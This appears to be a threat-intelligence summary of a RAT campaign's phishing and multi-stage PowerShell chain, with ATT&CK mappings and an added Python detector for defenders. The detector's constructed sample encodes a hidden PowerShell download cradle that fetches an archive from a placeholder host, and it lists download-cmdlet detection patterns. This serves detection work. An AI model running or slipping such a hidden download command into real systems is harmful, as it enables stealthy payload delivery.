EXECUTIVE SUMMARY
The campaign is attributed to a financially motivated cybercrime group that operates primarily from Eastern Europe. The threat takes the form of a Remote Access Trojan designed to gain persistent control over victim machines. Recent activity shows the actors targeting mid-size enterprises in the manufacturing, logistics, and professional services sectors across Europe and North America. The primary objective is to harvest credentials, exfiltrate proprietary data, and optionally enable ransom negotiations by holding critical systems hostage.
They also seek to establish footholds for future intrusion campaigns. The intrusion begins with a phishing email that carries a seemingly innocuous batch file. When executed, the file launches the Windows Script Host component, which in turn runs a VBScript that decodes a Base64 payload and passes it to PowerShell. The PowerShell command runs hidden, modifies the module search path, and retrieves a compressed archive from a cloud storage provider.
Inside the archive, a script interpreter extracts additional payloads, including a malicious image that actually contains encoded code. That code generates in-memory shellcode, injects it into a legitimate system utility, and finally installs the RAT, establishing a command-and-control channel.

The multi-stage approach makes the threat difficult to spot because each step blends with normal administrative behavior, using trusted binaries and encrypted archives that evade static inspection. In-memory reconstruction and process injection leave few forensic artifacts, complicating incident response and prolonging dwell time. Organisations should harden email gateways, enforce strict execution policies for script hosts, and monitor for anomalous use of legitimate utilities such as color management or compression tools. Regular backup verification, network segmentation, and deployment of endpoint detection that can flag unusual command-line patterns are essential to mitigate impact.
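The command-line patterns the summary tells defenders to watch for (a batch file launching Windows Script Host, which launches a hidden PowerShell with an encoded command that fetches and unpacks an archive) can be expressed as a small correlation rule over process-creation telemetry. The following detector is an added example written for this page, not code from the report or from either referenced vendor. It assumes Sysmon Event ID 1 style fields (pid, parent pid, image, command line); the event records, the process ids, the file paths and the `files.example.invalid` host are all constructed for the example.

```python
"""Flag the batch -> WSH -> hidden PowerShell -> download cradle chain.

Added example: field names follow Sysmon Event ID 1, but every record below
is constructed, not captured from a real host.
"""
import base64
import re
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str     # full path of the created process
    cmdline: str   # full command line as logged


SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# -w hidden / -WindowStyle Hidden in any of PowerShell's accepted short forms
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.IGNORECASE)
# -e / -ec / -enc / -EncodedCommand followed by a Base64 blob
ENC_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", re.IGNORECASE)
# Cmdlets and variables that, once decoded, point at the fetch-and-unpack stage
CRADLE_MARKERS = ("invoke-webrequest", "downloadfile", "downloadstring",
                  "start-bitstransfer", "expand-archive", "psmodulepath")


def basename(image: str) -> str:
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(blob: str) -> Optional[str]:
    """-EncodedCommand carries Base64 of UTF-16LE text; None if it is not that."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def ancestry(pid: int, by_pid: Dict[int, ProcEvent]) -> List[str]:
    """Image basenames from the process up to the root, child first."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(basename(by_pid[pid].image))
        pid = by_pid[pid].ppid
    return chain


def analyze(events: List[ProcEvent]) -> Dict[int, List[str]]:
    """Return {pid: reasons} for PowerShell processes with two or more indicators."""
    by_pid = {e.pid: e for e in events}
    findings: Dict[int, List[str]] = {}
    for e in events:
        if basename(e.image) != "powershell.exe":
            continue
        reasons = []
        chain = ancestry(e.pid, by_pid)
        parent = chain[1] if len(chain) > 1 else ""
        if parent in SCRIPT_HOSTS:
            reasons.append(f"spawned by script host {parent}")
        if len(chain) >= 3 and parent in SCRIPT_HOSTS and chain[2] == "cmd.exe":
            reasons.append("batch -> WSH -> PowerShell parent chain")
        if HIDDEN_RE.search(e.cmdline):
            reasons.append("hidden window requested")
        m = ENC_RE.search(e.cmdline)
        if m:
            decoded = decode_encoded_command(m.group(1))
            if decoded is None:
                reasons.append("encoded command is not Base64/UTF-16LE")
            else:
                hits = [k for k in CRADLE_MARKERS if k in decoded.lower()]
                if hits:
                    reasons.append("encoded command contains " + ", ".join(hits))
        # One indicator alone (e.g. a hidden scheduled task) is common; require two.
        if len(reasons) >= 2:
            findings[e.pid] = reasons
    return findings


# Constructed stage-2 command mirroring the report's description: module path
# change, archive fetched from a remote host, archive expanded.
STAGE2 = ('$env:PSModulePath = "$env:TEMP;" + $env:PSModulePath; '
          'Invoke-WebRequest -Uri https://files.example.invalid/pkg.zip -OutFile $env:TEMP\\pkg.zip; '
          'Expand-Archive $env:TEMP\\pkg.zip -DestinationPath $env:TEMP\\pkg')
ENCODED = base64.b64encode(STAGE2.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [  # constructed telemetry
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, r"C:\Windows\System32\cmd.exe",
              r'cmd.exe /c "C:\Users\alice\Downloads\invoice.bat"'),
    ProcEvent(300, 200, r"C:\Windows\System32\wscript.exe",
              r"wscript.exe //B C:\Users\alice\AppData\Local\Temp\inv.vbs"),
    ProcEvent(400, 300, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              f"powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand {ENCODED}"),
    # Benign activity that shares single features with the chain, not the combination.
    ProcEvent(500, 100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -NoProfile -Command Get-Service"),
    ProcEvent(600, 100, r"C:\Windows\System32\wscript.exe", r"wscript.exe C:\Scripts\logon.vbs"),
]

if __name__ == "__main__":
    for pid, reasons in analyze(SAMPLE_EVENTS).items():
        print(pid, "->", "; ".join(reasons))
```

The rule reports only when two or more indicators coincide, because each on its own (a hidden window, an encoded command, a script host parent) is routine in managed environments; the combination plus the cmd.exe ancestry is what distinguishes the chain the summary describes from ordinary administration.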
THREAT PROFILE:
| Tactic | Technique ID | Technique | Sub-technique |
|---|---|---|---|
| Initial Access | T1566.001 | Phishing | Spearphishing Attachment |
| Execution | T1059.005 | Command and Scripting Interpreter | Visual Basic |
| Execution | T1059.001 | Command and Scripting Interpreter | PowerShell |
| Defense Evasion | T1027 | Obfuscated Files or Information | — |
| Defense Evasion | T1036 | Masquerading | — |
| Privilege Escalation | T1055 | Process Injection | — |
| Defense Evasion | T1564.001 | Hide Artifacts | Hidden Files and Directories |
| Command and Control | T1105 | Ingress Tool Transfer | — |
REFERENCES:
The following reports contain further technical details:
https://securityonline.info/new-remcos-rat-variant-donutloader/
https://blog.gdatasoftware.com/2026/05/38426-donutloader-remcos-rat